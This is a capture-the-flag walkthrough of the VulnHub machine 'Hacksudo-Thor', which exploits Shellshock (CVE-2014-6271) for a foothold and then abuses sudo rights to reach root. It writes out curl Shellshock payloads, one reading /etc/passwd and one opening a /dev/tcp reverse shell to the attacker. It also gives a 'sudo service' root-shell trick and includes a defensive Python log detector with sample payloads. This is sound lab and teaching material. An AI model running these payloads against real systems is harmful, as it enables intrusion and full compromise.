VULNHUB: hacksudo-Thor
Hey everyone! Welcome to my CTF walkthrough for Vulnhub’s ‘Hacksudo-Thor.’ In this guide, we’re gonna dive into Shellshock exploitation, snag a foothold, and escalate our way to root. Lessssgoo!! 🚀💥
Download Link: https://download.vulnhub.com/hacksudo/hacksudo---Thor.zip
Author: Vishal Waghmare
Difficulty: Easy
Tools: netdiscover, nmap, gobuster, dirb and netcat
Step 1: Initial Enumeration
netdiscover -r 192.168.4.0/24
After identifying the target machine's IP address (192.168.4.29), we start the real enumeration using nmap:
nmap -sC -sV 192.168.4.29
I am tempted to look at FTP first, since we might find interesting stuff there. But we can't.
No worries, we will get back to it later. Let's look at the website and see if there is anything worthwhile.
A simple bank web app. Tried admin/admin as credentials, unsuccessfully.
Step 2: Web Enumeration
Let us try and enumerate directories of the web app.
gobuster dir -u http://192.168.4.29 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,html,php
After searching Google for "cgi-bin/shell.sh vulnerability", I found out that this is a well-known vulnerability called Shellshock (CVE-2014-6271).
Step 3: Foothold
I wanted to exploit this vulnerability manually to learn something about it. I was lucky enough to stumble upon this link on GitHub, https://github.com/opsxcq/exploit-CVE-2014-6271, and found this simple payload:
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \
http://localhost:8080/cgi-bin/vulnerable
I modified it to give me a reverse shell and set up my netcat listener on port 9001:
curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'sh -i >& /dev/tcp/192.168.4.8/9001 0>&1'" \
http://192.168.4.29/cgi-bin/shell.sh
Hurray, we got a shell as www-data.
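From the defender's side, the Shellshock probes above leave a distinctive marker in the web server's access log. The following Python script is an added example (not from the original post or the exploit repository): it parses constructed Apache combined-format log lines and flags requests whose User-Agent or Referer carries the "() {" function-definition prefix that CVE-2014-6271 depends on.

```python
import re

# Constructed sample Apache "combined"-format access-log lines (not from the original post):
# two Shellshock probes against /cgi-bin/shell.sh (one via User-Agent, one via Referer)
# and one ordinary browser request that must not be flagged.
SAMPLE_LOG = r'''
192.168.4.8 - - [10/Mar/2024:10:00:01 +0000] "GET /cgi-bin/shell.sh HTTP/1.1" 200 512 "-" "() { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'"
192.168.4.8 - - [10/Mar/2024:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"
192.168.4.8 - - [10/Mar/2024:10:00:09 +0000] "GET /cgi-bin/shell.sh HTTP/1.1" 200 512 "() {:;}; /bin/bash -c 'id'" "curl/7.88.1"
'''

# Apache combined log format: ip ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shellshock (CVE-2014-6271) needs an environment value that begins with a bash function
# definition "() {"; whitespace between "()" and "{" is optional, so tolerate both forms.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')


def parse_combined(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None


def shellshock_hits(log_text):
    """Return one record per request whose User-Agent or Referer carries the Shellshock
    marker; both headers are copied by Apache into the CGI script's environment."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_combined(line)
        if rec is None:
            continue
        for field in ("ua", "referer"):
            if SHELLSHOCK_RE.search(rec[field]):
                parts = rec["request"].split()
                path = parts[1] if len(parts) > 1 else rec["request"]
                hits.append({"ip": rec["ip"], "ts": rec["ts"], "path": path,
                             "field": field, "cgi": path.startswith("/cgi-bin/")})
                break  # one alert per request is enough
    return hits


if __name__ == "__main__":
    for hit in shellshock_hits(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} {hit['field']:7} {hit['path']} cgi={hit['cgi']}")
```

A hit with cgi=True against a host that still runs an unpatched bash is the case to treat as a likely compromise rather than a scan.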
Step 4: Privilege Escalation to thor
Now that we have a shell, let's try and see the users in the home directory.
After getting permission denied, I decided to look for commands that www-data is allowed to run with sudo, using the command sudo -l.
As you can see, www-data can execute the hammer.sh script owned by thor. I went ahead and ran the script with:
sudo -u thor /home/thor/./hammer.sh
and tried some random command. Apparently, we can enter any command and it will be executed. Let's get a shell as the user thor.
Let's go into the thor directory and see what's in there.
Apart from user.txt, which is the first flag, the rest is useless.
Step 5: Privilege Escalation to root
Let’s see if there is anything thor can run as root.
thor can run cat and service as root. Since cat only lets us read files (even sensitive ones like the shadow file), I looked up service on gtfobins.com and got this payload:
sudo service ../../bin/sh
Conclusion
In this machine, I discovered the Shellshock vulnerability, a previously unknown issue to me. Although it’s an older finding, there are likely still users operating the Apache version it affects. This was a valuable learning experience. Kudos to Vishal for providing us with hands-on exposure to this vulnerability.